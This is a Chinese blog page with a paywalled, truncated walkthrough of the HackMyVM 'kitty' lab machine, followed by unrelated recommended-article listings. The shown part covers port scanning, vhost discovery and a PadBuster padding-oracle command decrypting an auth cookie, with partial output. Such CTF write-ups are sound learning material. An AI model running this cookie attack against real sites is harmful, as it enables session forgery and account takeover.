hackmyvm: kitty walkthrough

已于 2022-06-28 10:54:46 修改
阅读量509 收藏
点赞数
分类专栏: hackmyvm 文章标签: 服务器 linux 网络
于 2022-06-27 17:33:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xdeclearn/article/details/125486155
版权

hackmyvm: kitty walkthrough

0x01 oracle padding

端口扫描:

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp  gitea

使用curl访问80端口, 被重定向到http://kitty.hmv.
301

该网站为一个静态网站,通过ffuf获取到了虚拟主机名 cookie.kitty.hmv.

cookie

注册用户test,查看cookie:

authtokn

使用 oraclepadding.pl 破解该cookie。

➜  ~ ./oraclepadding.pl http://cookie.kitty.hmv/home/index.php OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG 8 -cookies "auth=OZcSZ4xSsGEpdRpik43lIg0RsEWxBcJG"

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 8144

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       302     8144    ../login.php
2 **    255     302     0       ../logout.php?err=1
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (<
最低0.47元/天 解锁文章
xdeclearn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python画猫hellokitty_如何用铅笔画HelloKitty? 原来是这样的
weixin_39884492的博客
12-04 2755
Hello Kitty是大家耳熟能详的卡通人物,今天小编就和大家分享一下她的画法。希望能够帮助到大家。工具/材料铅笔(1支)橡皮擦(1块)A4纸(1张)操作方法01首先画出hello kitty的蝴蝶结,如下图所示。注意事项:(1)蝴蝶结不宜画太大,因为它的大小直接决定了hello kitty的大小;(2)画蝴蝶结两端的时候,可以先画成三角形,在慢慢修改,擦去多余线条(3)蝴蝶结两端左高右低。02...
kitty终端使用笔记
lxyoucan的博客
04-30 6627
简介 kitty是一个免费的开源 图形处理单元(GPU) 加速[2] [3] 终端仿真器,适用于Linux和macOS,专注于性能和功能。kitty 是用C和Python编程语言混合编写的,它是少数支持 GPU 和Alacritty的终端仿真器之一。kitty 与另一个程序 KiTTY 同名,它是用于Microsoft Windows的PuTTY的一个分支。[4] 特点 显示图像:安装ImageMagick后,添加到 .bashrc 交互式 Unicode 字符输入 ( ctrl+shift+u),按名称
Spring Boot + Spring Cloud 实现权限管理系统 后端篇(一):Kitty 系统介绍
朝雨忆轻尘
08-15 1320
在线演示 演示地址:http://139.196.87.48:9002/kitty 用户名:admin 密码:admin 温馨提示: 有在演示环境删除数据的童鞋们,如果可以的话,麻烦动动小指,右键头像菜单, 选择 -> 备份还原 帮忙恢复到系统默认备份数据,方便后来的童鞋查看,谢谢啦。 技术交流 为了方便大家提问和技术交流,整了个QQ群,欢迎童鞋们加入。 ...
Python实现hellokitty
热门推荐
兔子王
10-31 4万+
粉红色系列更新啦,我用python实现了一只kitty猫!
Python-turtle绘画旅程第二站:Hello Kitty
qq_36201854的博客
10-16 2万+
距离上一站已经时隔1年多,我承认很懒啦!利用python-turtle工具,通过调整角度、弧度完成作画,其实用到的方法很简单,就是需要耗费些精力不断地修整,闲话少说,先上个图吧! 画笔速度较慢,大家耐心等待,也可根据自己习惯调整,直接上代码: import math import turtle as t # 计算长度、角度 t1:画笔对象 r:半径 angle:扇形(圆形)的角度 def myarc(t1, r, angle): arc_length = 2 * math.pi *
The Frog Prince (青蛙王子) and Hello Kitty
既然选择了远方 便只顾风雨兼程 - 永强
08-28 3391
The Frog Prince (青蛙王子) and Hello Kitty
Java经典300例-基础篇-001:Hello Kitty
道纪书生的博客
06-25 1914
在DOS控制台输出“Hello Kitty”1. 新建记事本文件HelloKitty.txt,写入程序: 2. 将文件后缀直接改成.java3. 打开该文件所在的文件夹,在地址栏输入cmd打开命令行4. 输入“javac HelloKitty.java”,回车,将生成字节码文件HelloKitty.class5. 输入“java HelloKitty”,得到输出结果...
Kitty: 又一款基于 GPU 加速的终端工具
easylife206的专栏
05-26 7030
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !基于 GPU 的功能强大的终端仿真器(跨平台是王道)近几年越来越多人喜欢使用 dotfiles 中进行追踪自己的服务端相关的工具配置,这样就可以跨平台使用,只需要同步一下配置,即可无痛使用机器了。Kitty 是一个跨平台、特性丰富的基于 GPU 的终端模拟器。使用线程渲染将输入延迟最小化,以...
Kitty用HTML和css咋做,使用 CSS3 绘制 Hello Kitty
weixin_39903846的博客
08-03 988
偶然间看到了 SegmentFault 上的一篇文章,感受这个 Hello Kitty 画的还不错,心血来潮也用 CSS3 画了个 Hello Kitty,如今在这里记录一下详细的绘制过程。想要源码、素材、在线演示的同窗能够直接拉到最下面。css咱们先看下原图:html 结构分解从上图能够看出,Hello Kitty 由脸蛋、耳朵、红色蝴蝶结、眼睛、鼻子和六根胡须构成,因此 DOM 结构也相对简单...
kitty:KiTTY 稍微定制版
07-10
"Kitty: KiTTY 稍微定制版" 指的是一个基于原版 KiTTY 的修改版。KiTTY 是一个在 Windows 上运行的 SSH 客户端,它是 PuTTY 的分支,提供了更多的功能和自定义选项。这里的 "稍微定制版" 意味着开发者对原始的 KiTTY...
KiTTYKiTTY,Windows的免费telnetssh客户端
02-06
KiTTY是一款专为Windows平台设计的免费开源telnet和SSH客户端,它是PuTTY的分支版本。PuTTY是广受欢迎的远程连接工具,而KiTTY在PuTTY的基础上增加了一些额外的功能和改进,使得它更适合高级用户的需求。下面我们将...
kittyproject123:kitty项目
02-16
kittyproject123:kitty项目】是一个与HTML相关的项目,这表明它可能是一个网页开发项目。HTML,全称HyperText Markup Language,是构建网页的基础语言,用于描述网页内容和结构。在这个名为"kittyproject123-...
Kitty_Website:Kitty_Website
02-16
Kitty_Website:Kitty_Website】 "Kitty_Website"项目似乎是一个基于Go语言构建的个人或小型团队网站平台。从项目标题和描述来看,我们无法获取太多具体信息,但可以推测它可能是一个开源项目,或者至少是某个...
nord-kittykitty终端的nord主题
02-13
北基蒂(Nord-Kitty)是一款为 Kitty 终端模拟器设计的北欧风格主题。Kitty 是一个快速、可配置且强大的基于Qt的终端模拟器,它提供了丰富的自定义选项,允许用户根据个人喜好调整终端的外观和功能。Nord 主题则是...
Linux】进程间通信——匿名管道
最新发布
2201_76024104的博客
07-08 730
1.:一个进程需要将它的数据发送给另一个进程,比如我们有两个进程,一个负责获取数据,另一个负责处理数据,这时第一个进程就要将获取到的数据交给第二个进程2.:多个进程间共享同样的资源3.:一个进程需要给其他进程发送消息,通知他们发生了某种事件4.:有些事件需要完全控制另一个进程,比如我们在使用gdb调试时,gdb就是一个进程,它控制了我们要调试的进程进程之前是有互相传递信息的需求,但是,一个进程不可能去另一个进程的地址空间中取信息,所以这就要求操作系统去提供一块交换数据的空间来供进程之间使用。
MQTT教程--服务器使用EMQX和客户端使用MQTTX
yoyo勰的博客
07-04 1034
MQTT 是用于物联网连接的 OASIS 标准,它是一种基于发布订阅模式的、轻量级的消息传输协议,专为受限设备和低带宽、高延迟和不可靠的网络设计,并且能够提供一定的消息可靠性保证。得益于这些特性,MQTT 在车联网、工业制造、移动通信等领域广泛应用。目前 MQTT 的主要版本有 v3.1.1 和 v5.0,v5.0 于 2019 年 3 月发布,相比于 v3.1.1 引入了很多改进和增强,目前市面上绝大部分的客户端 和代理都已经支持了 MQTT v5.0。
Oracle数据库服务器CPU占用率巨高的问题排查思路
一杯温酒慰风尘,一段代码为爱好
07-04 207
1、where条件缺少主键;2、where条件缺少索引;3、对应主表数据量太大。
GNU/Linux - 什么是loopback设备
guoqx的专栏
07-04 573
在计算机科学中,特别是在类Unix操作系统中,环回设备(loopback device)是一种虚拟设备,它将一个文件映射为块设备。这使得可以像访问物理磁盘或分区一样访问一个文件。环回设备通常用于挂载磁盘镜像、操作文件系统镜像以及执行各种类型的系统测试和开发。
python画hellokitty代码.docx
10-11
he hellokitty code in Python using turtle library is a beautiful example of creating art with code. By adjusting angles and radians, the program is able to draw a cute hellokitty image on the screen. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值